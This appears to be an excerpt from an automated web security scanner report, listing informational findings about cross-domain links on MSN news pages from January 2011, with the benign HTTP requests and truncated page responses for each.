X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=5bb9558c3a634e0b8bcd485118a777c4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5C3FE70BEDFA4B11A600F7E11A761566; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:05 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406685&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FBillionaires-caucus.aspx%3Fcp-documentid%3D27464338&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=billionaires+caucus&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Billionaires Charles and David Koch (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Charles+and+David+Koch+&amp;FORM=msnpop">photos</a>) and their wealthy Republican friends are meeting at the Rancho Las Palmas Resort in Palm Springs, Calif., today. The brothers (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Koch+brothers+and+suspended+California%27s+climate+change+programs&amp;go=&amp;form=msnpop">find out what proposal they recently backed</a>) are reportedly the organizers, and the gathering likely will be <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=billionaires+caucus+and+activists+and+protest&amp;form=msnpop">met with protests</a>
...[SNIP]...
<div>Many of the world...s top leaders are meeting elsewhere. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?q=Davos+Switzerland&amp;mkt=en-US&amp;FORM=msnpop">See where.</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=rancho+las+palmas+resort&amp;go=&amp;form=msnpop">See photos</a>
...[SNIP]...
<div>Find out how the Koch brothers <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Koch+brothers+and+and+energy+and+other+industries&amp;go=&amp;form=msnpop">made their money</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.315. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Billionaires-caucus.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Billionaires-caucus.aspx?cp-documentid=27464338 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2db8a5d7e0384d16ae6190a3322af9a7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D3C35436CD3248958F6D41D92F69C552; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:06 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345066&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FBillionaires-caucus.aspx%3Fcp-documentid%3D27464338&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=billionaires+caucus&amp;go=&amp;form=msnpop"><strong>
...[SNIP]...
<div>Billionaires Charles and David Koch (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Charles+and+David+Koch+&amp;FORM=msnpop">photos</a>) and their wealthy Republican friends are meeting at the Rancho Las Palmas Resort in Palm Springs, Calif., today. The brothers (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Koch+brothers+and+suspended+California%27s+climate+change+programs&amp;go=&amp;form=msnpop">find out what proposal they recently backed</a>) are reportedly the organizers, and the gathering likely will be <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=billionaires+caucus+and+activists+and+protest&amp;form=msnpop">met with protests</a>
...[SNIP]...
<div>Many of the world...s top leaders are meeting elsewhere. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?q=Davos+Switzerland&amp;mkt=en-US&amp;FORM=msnpop">See where.</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=rancho+las+palmas+resort&amp;go=&amp;form=msnpop">See photos</a>
...[SNIP]...
<div>Find out how the Koch brothers <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Koch+brothers+and+and+energy+and+other+industries&amp;go=&amp;form=msnpop">made their money</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.316. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx?cp-documentid=27436496 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:00 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ff7f4bdf08de4d1e84fb30cb16ca789a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8CCEDA74FEB243D78C6103FEDCFEED26; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:00 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345060&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FCruise-ships-avoiding-stops-in-Mazatlan.aspx%3Fcp-documentid%3D27436496&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cruise+ships+Mazatlan&amp;form=msnpop"><strong>
...[SNIP]...
<div>Several cruise lines are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cruise+ships+Mazatlan&amp;form=msnpop">cancelling stops</a> at the Mexican Pacific port of Mazatlan (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?encType=1&amp;where1=Mazatlan%2c+Sinaloa%2c+Mexico&amp;qpvt=mazatlan+mexico&amp;FORM=msnpop">see map</a>), due to crime against tourists... Safety issues are such a concern, that the cruise..lines are setting up <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=cruise+line+security+mazatlan&amp;FORM=msnpop">a big meeting</a>
...[SNIP]...
<div>A popular Mexican singer recently had his <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mexican+singer+rape&amp;go=&amp;form=msnpop">rape charges dismissed</a>
...[SNIP]...
<div>Listen to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/music/songs/search?q=Kalimba&amp;FORM=msnpop">his music here</a>
...[SNIP]...
<div>Find out <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tips+when+traveling+to+mexico&amp;form=msnpop">other tips</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.317. http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx?cp-documentid=27436496 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=cb0e13afe0e54167b4ebee22727f3a71; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9144F6DA296741A0AC1AB2134F7BF283; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:55 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406675&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FCruise-ships-avoiding-stops-in-Mazatlan.aspx%3Fcp-documentid%3D27436496&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cruise+ships+Mazatlan&amp;form=msnpop"><strong>
...[SNIP]...
<div>Several cruise lines are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Cruise+ships+Mazatlan&amp;form=msnpop">cancelling stops</a> at the Mexican Pacific port of Mazatlan (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?encType=1&amp;where1=Mazatlan%2c+Sinaloa%2c+Mexico&amp;qpvt=mazatlan+mexico&amp;FORM=msnpop">see map</a>), due to crime against tourists... Safety issues are such a concern, that the cruise..lines are setting up <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=cruise+line+security+mazatlan&amp;FORM=msnpop">a big meeting</a>
...[SNIP]...
<div>A popular Mexican singer recently had his <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mexican+singer+rape&amp;go=&amp;form=msnpop">rape charges dismissed</a>
...[SNIP]...
<div>Listen to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/music/songs/search?q=Kalimba&amp;FORM=msnpop">his music here</a>
...[SNIP]...
<div>Find out <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tips+when+traveling+to+mexico&amp;form=msnpop">other tips</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.318. http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx?cp-documentid=27451865 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:12 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f14d0b25d052412f9f1ad851d1b9158c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=22CA2F9360784323B6E2C59E773E563F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345072&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FDaughter-held-in-moms-run-over-death.aspx%3Fcp-documentid%3D27451865&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+death"><strong>
...[SNIP]...
